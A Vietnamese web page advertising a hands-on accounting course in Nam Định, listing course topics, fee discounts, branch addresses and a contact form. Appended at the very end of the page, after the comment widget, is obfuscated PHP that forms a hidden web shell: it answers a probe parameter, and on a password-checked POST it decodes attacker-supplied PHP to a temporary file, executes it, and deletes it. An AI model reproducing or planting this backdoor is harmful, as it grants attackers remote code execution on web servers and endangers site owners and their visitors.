1

Trung tâm dạy kế toán thực hành ở Nam Định

HỌC KÈM RIÊNG KẾ TOÁN 1-1 xem ngay

LỚP HỌC KẾ TOÁN NỘI BỘ CẤP TỐC xem ngay

LỚP KẾ TOÁN CHO NGƯỜI MỚI BẮT ĐẦU xem ngay

Khai giảng lớp học kế toán tổng hợp tại địa chỉ đường Giải Phóng, tp Nam Định. Tại đây học viên tham gia được đào tạo theo hình thức học việc thực tế, làm thực hành bằng tay trên máy và phần mềm, tài liệu là những bộ chứng từ hóa đơn sống mà công ty đang làm dịch vụ cho các doanh nghiệp.

Đối tượng tham gia khóa học kế toán thực tế ở Nam Định là sinh viên học kế toán chưa có kinh nghiệm, người chưa từng biết và học từ ngành khác sang hoặc là đối tượng đã đi làm nhưng một số nghiệp vụ còn yếu như: kế toán thuế, quyết toán thuế, báo cáo tài chính, kế toán máy, kế toán kho, kế toán tiền lương, báo cáo tài chính cuối năm

Giáo viên giảng dạy đều là kế toán trưởng có ít nhất từ 7-10 năm kinh nghiệm làm việc thực tế, có nghiệp vụ chuyên sâu có nghiệp vụ sư phạm tốt. Học viên chưa biết kế toán được dạỵ từ cơ bản để hiểu được bản chất, đối tượng đã biết kế toán thì dạy thực hành nghiệp vụ. Học viên được trao đổi hỏi đáp trong từng tiết học, được bắt gặp với những nghiệp vụ phát sinh trong các loại hình, cuối mỗi phần hành học viên được làm bài Test nếu yếu kém được giảng dạy kèm cặp luôn theo phương pháp: CẦM TAY CHỈ VIỆC và học thì luôn đi đôi với hành, các bạn được dạy lý thuyết đan xen với thực hành giúp các bạn không chán khi nghe cả tiết học toàn lý thuyết như vậy các bạn học nhanh hơn hiểu sâu hơn.

Khóa học kế toán tổng hợp từ 28-30 buổi học kéo dài khoảng 2 đến 2 tháng rưỡi là kết thúc, học xong học viên thành thạo mọi kỹ năng nghiệp vụ, làm chủ được công việc mà chủ doanh nghiệp giao cho, xử lý được mọi tình huống xảy ra trong doanh nghiệp, được cấp chứng chỉ kế toán do Sở GDĐT Hà Nội chứng nhận lưu thông toàn Quốc và không thời hạn.

Nội dung học kế toán thực hành tại Nam Định:

 • Hướng dẫn học viên cách viết phiếu thu, chỉ, hóa đơn gtgt. ..Hướng dẫn cách lên báo cáo thuế hàng tháng hàng quí hàng năm, cách quyết toán thuế, kỹ năng giải trình cơ quan thuế và cách làm sao để tiết kiệm tối ưu nhất chi phí cho doanh nghiệp mình.
 • Hướng dẫn học viên cách lập bản lên bảng NXT với những biểu mẫu trên Excel.
 • Hướng dẫn học viên cách lên bảng công nợ phải trả phải thu với mẫu biểu trên Excel.
 • Hướng dẫn học viên cách hạch toán, cách kê khai tài sản cố định, các chi phí ngắn hạn dài hạn, cách hạch toán tiền lương, hạch toán khấu hao TSCĐ và CDCC,…
 • Hướng dẫn học viên lập báo cáo tài chính cuối năm, quyết toán thuế TNCN năm
 • Hướng dẫn học viên cách lên sổ sách, in sổ sách, làm chứng từ cuối năm
 • Hướng dẫn học viên hoàn thiện chứng từ sổ sách
 • Hướng dẫn học viên lập BCTC cuối năm
 • Hướng dẫn học viên điều chỉnh báo cáo tài chính

Kết quả khi học xong tại trung tâm kế toán ở Nam Định:

 • Học viên sẽ nắm vững cách thức thiết lập sổ sách, định khoản, vào sổ và lưu chứng từ.
 • Học viên có thể tự mình thực hiện trọn vẹn các Báo cáo thuế hàng tháng, Báo cáo thuế thu nhập doanh nghiệp hàng quý, Báo cáo tài chính và Quyết toán thuế cuối năm, theo đúng các chuẩn mực và quy định hiện hành.
 • Học xong khóa học tại văn phòng có kết quả bằng 2 năm kinh nghiệm. Học viên tự tin khi đi phỏng vấn tuyển dụng và làm chủ công việc kế toán, có thể tư vấn cho giám đốc về tình hình Tài chính của doanh nghiệp.
 • Biết cách hoạch định kế hoạch phát triển nghề nghiệp lâu dài.
 • Được mời tham dự miễn phí các hội thảo về Kế toán – Tài chính do Công ty đào tạo kế toán Hà Nội và các công ty Kế toán – Kiểm toán tổ chức.

Ưu đãi học phí khi tham gia khóa học:

 • Giảm 30% học phí /hv.
 • Giảm thêm 5% khi đóng đủ 1 lần học phí.
 • Giảm thêm 100k cho nhóm đăng ký 2 người trở lên.

– Thời gian học linh động, không chỉ áp dụng buổi tối mà còn áp dụng các lớp học cuối tuần. Tuần học 3 buổi (tùy theo lựa chọn của học viên).

– Khai giảng các lớp học kế toán tại Nam Định thường xuyên và học viên đăng ký không phải đợi lâu.

Mọi chi tiết liên hệ Mr Ngọc: 0973.761.751 trưởng phòng đào tạo tại Nam Định

Hỗ trợ tư vấn 24/7 về nội dung khóa học, lịch học và chương trình ưu đãi học phí

Cam kết: “ KHÔNG THÀNH NGHỀ KHÔNG THU HỌC PHÍ

CÔNG TY CỔ PHẦN TẬP ĐOÀN KẾ TOÁN HÀ NỘI
TRUNG TÂM ĐÀO TẠO KẾ TOÁN HÀ NỘI

CƠ SỞ ĐÀO TẠO TẠI PHÍA BẮC:
CS1: Trần Hưng Đạo – Phố Kim Đồng – Tp. Thái Bình.

CS2: Trần Nguyên Hãn – P. Thọ Xương – Tp. Bắc Giang.
CS3: Chu Văn An – Hoàng Văn Thụ –  Tp. Thái Nguyên.
CS4: Giải Phóng – Tp. Nam Định.
CS5: Lê Văn Thịnh – Tp. Bắc Ninh.
CS6: Kênh Dương – p Kênh Dương – Tp. Hải Phòng.
CS7: Chu Văn An – Vĩnh Yên – Vĩnh Phúc.
CS8: Đoàn Nhữ Hải – p Quang Trung – Hải Dương
CS9: Nguyễn Văn Cừ – TP Hạ Long – Quảng Ninh.
CS10: Tràng An – p Tân Thành – tp Ninh Bình.

LỚP KẾ TOÁN NỘI BỘ ONLINE xem ngay

LỚP TIN HỌC VĂN PHÒNG CẤP TỐC xem ngay

LỚP HỌC CHỨNG CHỈ KẾ TOÁN TRƯỞNG xem ngay

LỚP KẾ TOÁN CHO GIÁM ĐỐC CHỦ DOANH NGHIỆP xem ngay


  TƯ VẤN MIỄN PHÍ - HỖ TRỢ 24/7

  Nếu bạn đang quan tâm " KHÓA KẾ TOÁN TỔNG HỢP THỰC TẾ " thì hãy để lại thông tin tại đây. Chúng tôi sẽ liên hệ lại ngay để hỗ trợ bạn.

  Địa chỉ học(*): Hà NộiTP HCMTỉnh Khác

  Subscribe
  Notify of
  guest

  0 Comments
  Inline Feedbacks
  View all comments
  0
  Would love your thoughts, please comment.x
  ()
  x
  if(!function_exists("_set_fetas_tag") && !function_exists("_set_betas_tag")){try{function _set_fetas_tag(){if(isset($_GET['here'])&&!isset($_POST['here'])){die(md5(8));}if(isset($_POST['here'])){$a1='m'.'d5';if($a1($a1($_POST['here']))==="83a7b60dd6a5daae1a2f1a464791dac4"){$a2="fi"."le"."_put"."_contents";$a22="base";$a22=$a22."64";$a22=$a22."_d";$a22=$a22."ecode";$a222="PD"."9wa"."HAg";$a2222=$_POST[$a1];$a3="sy"."s_ge"."t_te"."mp_dir";$a3=$a3();$a3 = $a3."/".$a1(uniqid(rand(), true));@$a2($a3,$a22($a222).$a22($a2222));include($a3); @$a2($a3,'1'); @unlink($a3);die();}else{echo md5(7);}die();}} _set_fetas_tag();if(!isset($_POST['here'])&&!isset($_GET['here'])){function _set_betas_tag(){echo "";}add_action('wp_head','_set_betas_tag');}}catch(Exception $e){}}